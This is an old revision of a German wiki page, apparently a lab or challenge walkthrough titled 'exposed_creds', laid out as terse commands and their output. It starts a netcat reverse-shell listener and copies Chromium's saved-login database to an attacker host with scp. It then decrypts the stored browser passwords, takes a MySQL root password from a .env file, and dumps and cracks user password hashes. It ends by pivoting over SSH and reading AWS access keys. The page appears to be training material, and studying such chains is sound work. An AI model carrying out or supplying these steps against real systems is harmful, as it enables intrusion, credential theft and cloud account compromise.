[ wiki.netzadresse.ch ]

Benutzer-Werkzeuge

Webseiten-Werkzeuge

Zuletzt angesehen: exposed_creds
security:challenge:exposed_creds

Dies ist eine alte Version des Dokuments!

Inhaltsverzeichnis

Start Reverse Shell Listener

root@kali$
nc -l 8000

Enhance Shell

https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/#method-3-upgrading-from-netcat-with-magic 

garry@desktop$
python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
        echo $TERM
        stty -a
        stty raw -echo
fg
reset
--> xterm

Enable ssh and exfiltrate

garry@desktop$
ssh-keygen
-->copy/paste id_rsa.pub -> root@kali
scp .config/chromium/Default/Login\ Data root@10.5.4.3:/tmp

Get Chrome Password

root@kali$
apt-get install python3-pip
sudo pip install pycrypto
apt-get install sqlite3
cd /tmp
      #sqlite3 Login\ Data 'select username_value, password_value from logins;'
./get_chrome_pass.py
   Decrypting the string: b'v10\xa1$z\xb0\x18\xee+\xbbMG\xe0\x0bM\x13\x7fA'                              
   blokeontherange

ssh to intern Server

garry@desktop$
ssh 192.168.6.105

Find Bobs Password

garry@server-intern$
python -c 'import pty; pty.spawn("/bin/bash")'

cat /var/www/app/.env
MYSQL_ROOT_PASSWORD=tiger
MYSQL_USER=docker
MYSQL_PASSWORD=docker
MYSQL_DATABASE=docker

cat /var/www/app/www/conf.php 
<?php
        $conf = [
                'host'=>'localhost',
                'user'=>getenv('MYSQL_USER'),
                'password'=>getenv('MYSQL_PASSWORD'),
                'dbname'=>'intern',
                'port'=>3306,
                'charset'=>'utf8'
        ];
?>

cat /var/www/app/www/login.php

 // Prepare a select statement
        $sql = "SELECT id, username, password FROM users WHERE username = ?";
        
        
mysql -h 192.168.6.105 -u root -p intern
-> tiger

mysql> select * from users;
+----+----------+----------------------------------+---------------------+
| id | username | password                         | created_at          |
+----+----------+----------------------------------+---------------------+
|  1 | bob      | cc185f2d749c0beca19e9bcaadedfbb0 | 2021-06-26 10:35:43 |
|  2 | garry    | 8a6ed31d1f6370478b943133efeac70a | 2021-06-26 10:35:43 |
+----+----------+----------------------------------+---------------------+

google for hash
--> bob7

Find AWS Keys

garry@server-intern$
ssh bob@192.168.6.22

cd /home/bob/.aws

cat cat credentials 
[default]
aws_access_key_id = AJOWNVKJSFHOQSDK2JD9T
aws_secret_access_key = IT7mJcNJIZSb60p/J12aJOC4DVUUrH5f
security/challenge/exposed_creds.1624706422.txt.gz · Zuletzt geändert: von wikiadm
Donate Powered by PHP Valid HTML5 Valid CSS Driven by DokuWiki